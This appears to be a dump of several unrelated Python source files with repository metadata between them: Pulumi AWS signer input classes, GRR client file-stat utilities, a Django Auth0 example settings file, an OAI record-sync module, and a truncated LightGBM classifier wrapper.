def s3(self) -> pulumi.Input['SigningJobSourceS3Args']:
"""
A configuration block describing the S3 Destination object: See S3 Destination below for details.
"""
return pulumi.get(self, "s3")
@s3.setter
def s3(self, value: pulumi.Input['SigningJobSourceS3Args']):
pulumi.set(self, "s3", value)
@pulumi.input_type
class SigningJobSourceS3Args:
def __init__(__self__, *,
bucket: pulumi.Input[str],
key: pulumi.Input[str],
version: pulumi.Input[str]):
"""
:param pulumi.Input[str] bucket: Name of the S3 bucket.
:param pulumi.Input[str] key: Key name of the object that contains your unsigned code.
:param pulumi.Input[str] version: Version of your source image in your version enabled S3 bucket.
"""
pulumi.set(__self__, "bucket", bucket)
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "version", version)
@property
@pulumi.getter
def bucket(self) -> pulumi.Input[str]:
"""
Name of the S3 bucket.
"""
return pulumi.get(self, "bucket")
@bucket.setter
def bucket(self, value: pulumi.Input[str]):
pulumi.set(self, "bucket", value)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
"""
Key name of the object that contains your unsigned code.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def version(self) -> pulumi.Input[str]:
"""
Version of your source image in your version enabled S3 bucket.
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: pulumi.Input[str]):
pulumi.set(self, "version", value)
@pulumi.input_type
class SigningProfileRevocationRecordArgs:
def __init__(__self__, *,
revocation_effective_from: Optional[pulumi.Input[str]] = None,
revoked_at: Optional[pulumi.Input[str]] = None,
revoked_by: Optional[pulumi.Input[str]] = None):
if revocation_effective_from is not None:
pulumi.set(__self__, "revocation_effective_from", revocation_effective_from)
if revoked_at is not None:
pulumi.set(__self__, "revoked_at", revoked_at)
if revoked_by is not None:
pulumi.set(__self__, "revoked_by", revoked_by)
@property
@pulumi.getter(name="revocationEffectiveFrom")
def revocation_effective_from(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "revocation_effective_from")
@revocation_effective_from.setter
def revocation_effective_from(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "revocation_effective_from", value)
@property
@pulumi.getter(name="revokedAt")
def revoked_at(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "revoked_at")
@revoked_at.setter
def revoked_at(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "revoked_at", value)
@property
@pulumi.getter(name="revokedBy")
def revoked_by(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "revoked_by")
@revoked_by.setter
def revoked_by(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "revoked_by", value)
@pulumi.input_type
class SigningProfileSignatureValidityPeriodArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
value: pulumi.Input[int]):
pulumi.set(__self__, "type", type)
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def value(self) -> pulumi.Input[int]:
return pulumi.get(self, "value")
@value.setter
def value(self, value: pulumi.Input[int]):
pulumi.set(self, "value", value)
| 32.820122
| 186
| 0.636693
|
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'SigningJobDestinationArgs',
'SigningJobDestinationS3Args',
'SigningJobRevocationRecordArgs',
'SigningJobSignedObjectArgs',
'SigningJobSignedObjectS3Args',
'SigningJobSourceArgs',
'SigningJobSourceS3Args',
'SigningProfileRevocationRecordArgs',
'SigningProfileSignatureValidityPeriodArgs',
]
@pulumi.input_type
class SigningJobDestinationArgs:
def __init__(__self__, *,
s3: pulumi.Input['SigningJobDestinationS3Args']):
pulumi.set(__self__, "s3", s3)
@property
@pulumi.getter
def s3(self) -> pulumi.Input['SigningJobDestinationS3Args']:
return pulumi.get(self, "s3")
@s3.setter
def s3(self, value: pulumi.Input['SigningJobDestinationS3Args']):
pulumi.set(self, "s3", value)
@pulumi.input_type
class SigningJobDestinationS3Args:
def __init__(__self__, *,
bucket: pulumi.Input[str],
prefix: Optional[pulumi.Input[str]] = None):
pulumi.set(__self__, "bucket", bucket)
if prefix is not None:
pulumi.set(__self__, "prefix", prefix)
@property
@pulumi.getter
def bucket(self) -> pulumi.Input[str]:
return pulumi.get(self, "bucket")
@bucket.setter
def bucket(self, value: pulumi.Input[str]):
pulumi.set(self, "bucket", value)
@property
@pulumi.getter
def prefix(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "prefix")
@prefix.setter
def prefix(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "prefix", value)
@pulumi.input_type
class SigningJobRevocationRecordArgs:
def __init__(__self__, *,
reason: Optional[pulumi.Input[str]] = None,
revoked_at: Optional[pulumi.Input[str]] = None,
revoked_by: Optional[pulumi.Input[str]] = None):
if reason is not None:
pulumi.set(__self__, "reason", reason)
if revoked_at is not None:
pulumi.set(__self__, "revoked_at", revoked_at)
if revoked_by is not None:
pulumi.set(__self__, "revoked_by", revoked_by)
@property
@pulumi.getter
def reason(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "reason")
@reason.setter
def reason(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reason", value)
@property
@pulumi.getter(name="revokedAt")
def revoked_at(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "revoked_at")
@revoked_at.setter
def revoked_at(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "revoked_at", value)
@property
@pulumi.getter(name="revokedBy")
def revoked_by(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "revoked_by")
@revoked_by.setter
def revoked_by(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "revoked_by", value)
@pulumi.input_type
class SigningJobSignedObjectArgs:
def __init__(__self__, *,
s3s: Optional[pulumi.Input[Sequence[pulumi.Input['SigningJobSignedObjectS3Args']]]] = None):
if s3s is not None:
pulumi.set(__self__, "s3s", s3s)
@property
@pulumi.getter
def s3s(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SigningJobSignedObjectS3Args']]]]:
return pulumi.get(self, "s3s")
@s3s.setter
def s3s(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SigningJobSignedObjectS3Args']]]]):
pulumi.set(self, "s3s", value)
@pulumi.input_type
class SigningJobSignedObjectS3Args:
def __init__(__self__, *,
bucket: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None):
if bucket is not None:
pulumi.set(__self__, "bucket", bucket)
if key is not None:
pulumi.set(__self__, "key", key)
@property
@pulumi.getter
def bucket(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "bucket")
@bucket.setter
def bucket(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "bucket", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@pulumi.input_type
class SigningJobSourceArgs:
def __init__(__self__, *,
s3: pulumi.Input['SigningJobSourceS3Args']):
pulumi.set(__self__, "s3", s3)
@property
@pulumi.getter
def s3(self) -> pulumi.Input['SigningJobSourceS3Args']:
return pulumi.get(self, "s3")
@s3.setter
def s3(self, value: pulumi.Input['SigningJobSourceS3Args']):
pulumi.set(self, "s3", value)
@pulumi.input_type
class SigningJobSourceS3Args:
def __init__(__self__, *,
bucket: pulumi.Input[str],
key: pulumi.Input[str],
version: pulumi.Input[str]):
pulumi.set(__self__, "bucket", bucket)
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "version", version)
@property
@pulumi.getter
def bucket(self) -> pulumi.Input[str]:
return pulumi.get(self, "bucket")
@bucket.setter
def bucket(self, value: pulumi.Input[str]):
pulumi.set(self, "bucket", value)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def version(self) -> pulumi.Input[str]:
return pulumi.get(self, "version")
@version.setter
def version(self, value: pulumi.Input[str]):
pulumi.set(self, "version", value)
@pulumi.input_type
class SigningProfileRevocationRecordArgs:
def __init__(__self__, *,
revocation_effective_from: Optional[pulumi.Input[str]] = None,
revoked_at: Optional[pulumi.Input[str]] = None,
revoked_by: Optional[pulumi.Input[str]] = None):
if revocation_effective_from is not None:
pulumi.set(__self__, "revocation_effective_from", revocation_effective_from)
if revoked_at is not None:
pulumi.set(__self__, "revoked_at", revoked_at)
if revoked_by is not None:
pulumi.set(__self__, "revoked_by", revoked_by)
@property
@pulumi.getter(name="revocationEffectiveFrom")
def revocation_effective_from(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "revocation_effective_from")
@revocation_effective_from.setter
def revocation_effective_from(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "revocation_effective_from", value)
@property
@pulumi.getter(name="revokedAt")
def revoked_at(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "revoked_at")
@revoked_at.setter
def revoked_at(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "revoked_at", value)
@property
@pulumi.getter(name="revokedBy")
def revoked_by(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "revoked_by")
@revoked_by.setter
def revoked_by(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "revoked_by", value)
@pulumi.input_type
class SigningProfileSignatureValidityPeriodArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
value: pulumi.Input[int]):
pulumi.set(__self__, "type", type)
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def value(self) -> pulumi.Input[int]:
return pulumi.get(self, "value")
@value.setter
def value(self, value: pulumi.Input[int]):
pulumi.set(self, "value", value)
| true
| true
|
790dad6bf0d7a8a279a293c04eee935f54123d69
| 3,344
|
py
|
Python
|
grr/client/grr_response_client/client_utils.py
|
billstackpole/grr
|
203a0a99990a2d4004aed84a5cd822cbda2b418c
|
[
"Apache-2.0"
] | 1
|
2019-03-28T07:09:41.000Z
|
2019-03-28T07:09:41.000Z
|
grr/client/grr_response_client/client_utils.py
|
gingogo/grr
|
203a0a99990a2d4004aed84a5cd822cbda2b418c
|
[
"Apache-2.0"
] | null | null | null |
grr/client/grr_response_client/client_utils.py
|
gingogo/grr
|
203a0a99990a2d4004aed84a5cd822cbda2b418c
|
[
"Apache-2.0"
] | 1
|
2018-08-30T14:50:24.000Z
|
2018-08-30T14:50:24.000Z
|
#!/usr/bin/env python
"""Client utilities."""
import logging
import sys
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import client_fs as rdf_client_fs
from grr_response_core.lib.rdfvalues import paths as rdf_paths
# pylint: disable=g-import-not-at-top
if sys.platform == "win32":
from grr_response_client import client_utils_windows as _client_utils
elif sys.platform == "darwin":
from grr_response_client import client_utils_osx as _client_utils
else:
from grr_response_client import client_utils_linux as _client_utils
# pylint: enable=g-import-not-at-top
# pylint: disable=g-bad-name
CanonicalPathToLocalPath = _client_utils.CanonicalPathToLocalPath
FindProxies = _client_utils.FindProxies
GetExtAttrs = _client_utils.GetExtAttrs
GetRawDevice = _client_utils.GetRawDevice
KeepAlive = _client_utils.KeepAlive
LocalPathToCanonicalPath = _client_utils.LocalPathToCanonicalPath
MemoryRegions = _client_utils.MemoryRegions
NannyController = _client_utils.NannyController
OpenProcessForMemoryAccess = _client_utils.OpenProcessForMemoryAccess
TransactionLog = _client_utils.TransactionLog
VerifyFileOwner = _client_utils.VerifyFileOwner
# pylint: enable=g-bad-name
def StatEntryFromPath(path, pathspec, ext_attrs=True):
"""Builds a stat entry object from a given path.
Args:
path: A path (string value) to stat.
pathspec: A `PathSpec` corresponding to the `path`.
ext_attrs: Whether to include extended file attributes in the result.
Returns:
`StatEntry` object.
"""
try:
stat = utils.Stat(path)
except (IOError, OSError) as error:
logging.error("Failed to obtain stat for '%s': %s", pathspec, error)
return rdf_client_fs.StatEntry(pathspec=pathspec)
return StatEntryFromStat(stat, pathspec, ext_attrs=ext_attrs)
def StatEntryFromStat(stat, pathspec, ext_attrs=True):
"""Build a stat entry object from a given stat object.
Args:
stat: A `Stat` object.
pathspec: A `PathSpec` from which `stat` was obtained.
ext_attrs: Whether to include extended file attributes in the result.
Returns:
`StatEntry` object.
"""
result = rdf_client_fs.StatEntry(pathspec=pathspec)
for attr in _STAT_ATTRS:
value = getattr(stat.GetRaw(), attr, None)
if value is None:
continue
# TODO(hanuszczak): Why are we doing this?
value = int(value)
if value < 0:
value &= 0xFFFFFFFF
setattr(result, attr, value)
result.st_flags_linux = stat.GetLinuxFlags()
result.st_flags_osx = stat.GetOsxFlags()
if ext_attrs:
# TODO(hanuszczak): Can we somehow incorporate extended attribute getter to
# the `Stat` class? That would make the code a lot prettier but would force
# `utils` to depend on `xattrs`.
result.ext_attrs = list(GetExtAttrs(stat.GetPath()))
return result
def StatEntryFromStatPathSpec(stat, ext_attrs):
pathspec = rdf_paths.PathSpec(
pathtype=rdf_paths.PathSpec.PathType.OS,
path=LocalPathToCanonicalPath(stat.GetPath()),
path_options=rdf_paths.PathSpec.Options.CASE_LITERAL)
return StatEntryFromStat(stat, pathspec, ext_attrs=ext_attrs)
_STAT_ATTRS = [
"st_mode",
"st_ino",
"st_dev",
"st_nlink",
"st_uid",
"st_gid",
"st_size",
"st_atime",
"st_mtime",
"st_ctime",
"st_blocks",
"st_blksize",
"st_rdev",
]
| 29.078261
| 79
| 0.746112
|
import logging
import sys
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import client_fs as rdf_client_fs
from grr_response_core.lib.rdfvalues import paths as rdf_paths
if sys.platform == "win32":
from grr_response_client import client_utils_windows as _client_utils
elif sys.platform == "darwin":
from grr_response_client import client_utils_osx as _client_utils
else:
from grr_response_client import client_utils_linux as _client_utils
CanonicalPathToLocalPath = _client_utils.CanonicalPathToLocalPath
FindProxies = _client_utils.FindProxies
GetExtAttrs = _client_utils.GetExtAttrs
GetRawDevice = _client_utils.GetRawDevice
KeepAlive = _client_utils.KeepAlive
LocalPathToCanonicalPath = _client_utils.LocalPathToCanonicalPath
MemoryRegions = _client_utils.MemoryRegions
NannyController = _client_utils.NannyController
OpenProcessForMemoryAccess = _client_utils.OpenProcessForMemoryAccess
TransactionLog = _client_utils.TransactionLog
VerifyFileOwner = _client_utils.VerifyFileOwner
def StatEntryFromPath(path, pathspec, ext_attrs=True):
try:
stat = utils.Stat(path)
except (IOError, OSError) as error:
logging.error("Failed to obtain stat for '%s': %s", pathspec, error)
return rdf_client_fs.StatEntry(pathspec=pathspec)
return StatEntryFromStat(stat, pathspec, ext_attrs=ext_attrs)
def StatEntryFromStat(stat, pathspec, ext_attrs=True):
result = rdf_client_fs.StatEntry(pathspec=pathspec)
for attr in _STAT_ATTRS:
value = getattr(stat.GetRaw(), attr, None)
if value is None:
continue
value = int(value)
if value < 0:
value &= 0xFFFFFFFF
setattr(result, attr, value)
result.st_flags_linux = stat.GetLinuxFlags()
result.st_flags_osx = stat.GetOsxFlags()
if ext_attrs:
result.ext_attrs = list(GetExtAttrs(stat.GetPath()))
return result
def StatEntryFromStatPathSpec(stat, ext_attrs):
pathspec = rdf_paths.PathSpec(
pathtype=rdf_paths.PathSpec.PathType.OS,
path=LocalPathToCanonicalPath(stat.GetPath()),
path_options=rdf_paths.PathSpec.Options.CASE_LITERAL)
return StatEntryFromStat(stat, pathspec, ext_attrs=ext_attrs)
_STAT_ATTRS = [
"st_mode",
"st_ino",
"st_dev",
"st_nlink",
"st_uid",
"st_gid",
"st_size",
"st_atime",
"st_mtime",
"st_ctime",
"st_blocks",
"st_blksize",
"st_rdev",
]
| true
| true
|
790dae2213573bb04aeb653ea71d00b40d4cde44
| 4,045
|
py
|
Python
|
01-Login/webappexample/settings.py
|
alexisluque/auth0-django-web-app
|
4c6a530fac04e2b48f2dc85cc8ef414e2b03c599
|
[
"MIT"
] | null | null | null |
01-Login/webappexample/settings.py
|
alexisluque/auth0-django-web-app
|
4c6a530fac04e2b48f2dc85cc8ef414e2b03c599
|
[
"MIT"
] | 1
|
2018-07-09T14:23:54.000Z
|
2018-07-09T14:23:54.000Z
|
01-Login/webappexample/settings.py
|
alexisluque/auth0-django-web-app
|
4c6a530fac04e2b48f2dc85cc8ef414e2b03c599
|
[
"MIT"
] | null | null | null |
"""
Django settings for webappexample project.
Generated by 'django-admin startproject' using Django 1.11.4.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
from dotenv import load_dotenv, find_dotenv
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '*dn4z%$4b6-d1+epmb=hd1m3g#$*1*%&%x+4m_8*cvakee%=7q'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'social_django',
'auth0login'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'webappexample.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'webappexample.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
ENV_FILE = find_dotenv()
if ENV_FILE:
load_dotenv(ENV_FILE)
# SOCIAL AUTH AUTH0 BACKEND CONFIG
SOCIAL_AUTH_TRAILING_SLASH = False
SOCIAL_AUTH_AUTH0_KEY = os.environ.get('AUTH0_CLIENT_ID')
SOCIAL_AUTH_AUTH0_SECRET = os.environ.get('AUTH0_CLIENT_SECRET')
SOCIAL_AUTH_AUTH0_SCOPE = [
'openid',
'profile'
]
SOCIAL_AUTH_AUTH0_DOMAIN = os.environ.get('AUTH0_DOMAIN')
AUDIENCE = None
if os.environ.get('AUTH0_AUDIENCE'):
AUDIENCE = os.environ.get('AUTH0_AUDIENCE')
else:
if SOCIAL_AUTH_AUTH0_DOMAIN:
AUDIENCE = 'https://' + SOCIAL_AUTH_AUTH0_DOMAIN + '/userinfo'
if AUDIENCE:
SOCIAL_AUTH_AUTH0_AUTH_EXTRA_ARGUMENTS = {'audience': AUDIENCE}
AUTHENTICATION_BACKENDS = {
'auth0login.auth0backend.Auth0',
'django.contrib.auth.backends.ModelBackend'
}
LOGIN_URL = '/login/auth0'
LOGIN_REDIRECT_URL = '/dashboard'
| 26.096774
| 91
| 0.710507
|
from dotenv import load_dotenv, find_dotenv
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = '*dn4z%$4b6-d1+epmb=hd1m3g#$*1*%&%x+4m_8*cvakee%=7q'
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'social_django',
'auth0login'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'webappexample.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'webappexample.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
ENV_FILE = find_dotenv()
if ENV_FILE:
load_dotenv(ENV_FILE)
# SOCIAL AUTH AUTH0 BACKEND CONFIG
SOCIAL_AUTH_TRAILING_SLASH = False
SOCIAL_AUTH_AUTH0_KEY = os.environ.get('AUTH0_CLIENT_ID')
SOCIAL_AUTH_AUTH0_SECRET = os.environ.get('AUTH0_CLIENT_SECRET')
SOCIAL_AUTH_AUTH0_SCOPE = [
'openid',
'profile'
]
SOCIAL_AUTH_AUTH0_DOMAIN = os.environ.get('AUTH0_DOMAIN')
AUDIENCE = None
if os.environ.get('AUTH0_AUDIENCE'):
AUDIENCE = os.environ.get('AUTH0_AUDIENCE')
else:
if SOCIAL_AUTH_AUTH0_DOMAIN:
AUDIENCE = 'https://' + SOCIAL_AUTH_AUTH0_DOMAIN + '/userinfo'
if AUDIENCE:
SOCIAL_AUTH_AUTH0_AUTH_EXTRA_ARGUMENTS = {'audience': AUDIENCE}
AUTHENTICATION_BACKENDS = {
'auth0login.auth0backend.Auth0',
'django.contrib.auth.backends.ModelBackend'
}
LOGIN_URL = '/login/auth0'
LOGIN_REDIRECT_URL = '/dashboard'
| true
| true
|
790daea48156492a628ca355400ac2fc6d76bdbc
| 2,288
|
py
|
Python
|
daiquiri/oai/utils.py
|
agy-why/daiquiri
|
4d3e2ce51e202d5a8f1df404a0094a4e018dcb4d
|
[
"Apache-2.0"
] | 14
|
2018-12-23T18:35:02.000Z
|
2021-12-15T04:55:12.000Z
|
daiquiri/oai/utils.py
|
agy-why/daiquiri
|
4d3e2ce51e202d5a8f1df404a0094a4e018dcb4d
|
[
"Apache-2.0"
] | 40
|
2018-12-20T12:44:05.000Z
|
2022-03-21T11:35:20.000Z
|
daiquiri/oai/utils.py
|
agy-why/daiquiri
|
4d3e2ce51e202d5a8f1df404a0094a4e018dcb4d
|
[
"Apache-2.0"
] | 5
|
2019-05-16T08:03:35.000Z
|
2021-08-23T20:03:11.000Z
|
import logging
from django.conf import settings
from daiquiri.core.utils import import_class
from .adapter import OaiAdapter
from .models import Record
logger = logging.getLogger(__name__)
def get_metadata_format(metadata_prefix):
return next(metadata_format for metadata_format in settings.OAI_METADATA_FORMATS
if metadata_format['prefix'] == metadata_prefix)
def get_renderer(metadata_prefix):
renderer_class = get_metadata_format(metadata_prefix)['renderer_class']
return import_class(renderer_class)()
def update_records(resource_type, resource):
logger.debug('update_records %s %s', resource_type, resource)
adapter = OaiAdapter()
try:
resource_id, identifier, datestamp, set_spec, public = adapter.get_record(resource_type, resource)
except TypeError:
raise RuntimeError('Could not obtain record for %s %s' % (resource_type, resource))
if public is True:
for metadata_prefix in adapter.resource_types[resource_type]:
try:
record = Record.objects.get(identifier=identifier, metadata_prefix=metadata_prefix)
except Record.DoesNotExist:
record = Record(identifier=identifier, metadata_prefix=metadata_prefix)
record.datestamp = datestamp
record.set_spec = set_spec
record.deleted = False
record.resource_type = resource_type
record.resource_id = resource_id
record.save()
else:
delete_records(resource_type, resource)
def delete_records(resource_type, resource):
logger.debug('delete_records %s %s', resource_type, resource)
adapter = OaiAdapter()
try:
resource_id, identifier, datestamp, set_spec, public = adapter.get_record(resource_type, resource)
except TypeError:
raise RuntimeError('Could not obtain record for %s %s' % (resource_type, resource))
for metadata_prefix in adapter.resource_types[resource_type]:
try:
record = Record.objects.get(identifier=identifier, metadata_prefix=metadata_prefix)
record.datestamp = datestamp
record.set_spec = set_spec
record.deleted = True
record.save()
except Record.DoesNotExist:
pass
| 33.15942
| 106
| 0.697115
|
import logging
from django.conf import settings
from daiquiri.core.utils import import_class
from .adapter import OaiAdapter
from .models import Record
logger = logging.getLogger(__name__)
def get_metadata_format(metadata_prefix):
return next(metadata_format for metadata_format in settings.OAI_METADATA_FORMATS
if metadata_format['prefix'] == metadata_prefix)
def get_renderer(metadata_prefix):
renderer_class = get_metadata_format(metadata_prefix)['renderer_class']
return import_class(renderer_class)()
def update_records(resource_type, resource):
logger.debug('update_records %s %s', resource_type, resource)
adapter = OaiAdapter()
try:
resource_id, identifier, datestamp, set_spec, public = adapter.get_record(resource_type, resource)
except TypeError:
raise RuntimeError('Could not obtain record for %s %s' % (resource_type, resource))
if public is True:
for metadata_prefix in adapter.resource_types[resource_type]:
try:
record = Record.objects.get(identifier=identifier, metadata_prefix=metadata_prefix)
except Record.DoesNotExist:
record = Record(identifier=identifier, metadata_prefix=metadata_prefix)
record.datestamp = datestamp
record.set_spec = set_spec
record.deleted = False
record.resource_type = resource_type
record.resource_id = resource_id
record.save()
else:
delete_records(resource_type, resource)
def delete_records(resource_type, resource):
logger.debug('delete_records %s %s', resource_type, resource)
adapter = OaiAdapter()
try:
resource_id, identifier, datestamp, set_spec, public = adapter.get_record(resource_type, resource)
except TypeError:
raise RuntimeError('Could not obtain record for %s %s' % (resource_type, resource))
for metadata_prefix in adapter.resource_types[resource_type]:
try:
record = Record.objects.get(identifier=identifier, metadata_prefix=metadata_prefix)
record.datestamp = datestamp
record.set_spec = set_spec
record.deleted = True
record.save()
except Record.DoesNotExist:
pass
| true
| true
|
790dafb3cd44c4622f4bde96ce06a13b96b35e6e
| 2,003
|
py
|
Python
|
classifier/src/model_lgb.py
|
banboooo044/natural-language-sentiment-anaysis
|
e18d7c0373d9f0a00d5a3cc14abf671081bc940b
|
[
"DOC"
] | null | null | null |
classifier/src/model_lgb.py
|
banboooo044/natural-language-sentiment-anaysis
|
e18d7c0373d9f0a00d5a3cc14abf671081bc940b
|
[
"DOC"
] | null | null | null |
classifier/src/model_lgb.py
|
banboooo044/natural-language-sentiment-anaysis
|
e18d7c0373d9f0a00d5a3cc14abf671081bc940b
|
[
"DOC"
] | null | null | null |
import os,sys
sys.path.append('../')
import os
import numpy as np
import pandas as pd
import lightgbm as lgb
from src.model import Model
from src.util import Util
from sklearn.metrics import log_loss, accuracy_score, f1_score, classification_report
class ModelLGB(Model):
def __init__(self, run_fold_name, **params):
super().__init__(run_fold_name, params)
def train(self, tr_x, tr_y, va_x=None, va_y=None):
validation = va_x is not None
dtrain = lgb.Dataset(tr_x, label=tr_y)
if validation:
dvalid = lgb.Dataset(va_x, label=va_y)
params = dict(self.params)
num_round = params.pop('num_boost_round')
if validation:
# バリデーションデータが存在する場合, Eearly Stoppingを行う
early_stopping_rounds = params.pop('early_stopping_rounds')
watchlist = [dtrain, dvalid ]
self.model = lgb.train(params, dtrain, num_round, valid_sets=watchlist,
valid_names=['train','eval'],
early_stopping_rounds=early_stopping_rounds)
else:
watchlist = [(dtrain, 'train')]
self.model = lgb.train(params, dtrain, num_round, evals=watchlist)
def predict(self, te_x):
return self.model.predict(te_x, ntree_limit=self.model.best_iteration)
def score(self, te_x, te_y):
pred_prob = self.predict(te_x)
y_pred = np.argmax(pred_prob, axis=1)
# print(classification_report(te_y, y_pred))
return f1_score(np.identity(5)[te_y], np.identity(5)[y_pred], average='samples')
def save_model(self, feature):
model_path = os.path.join(f'../model/model/{feature}', f'{self.run_fold_name}.model')
os.makedirs(os.path.dirname(model_path), exist_ok=True)
Util.dump(self.model, model_path)
def load_model(self, feature):
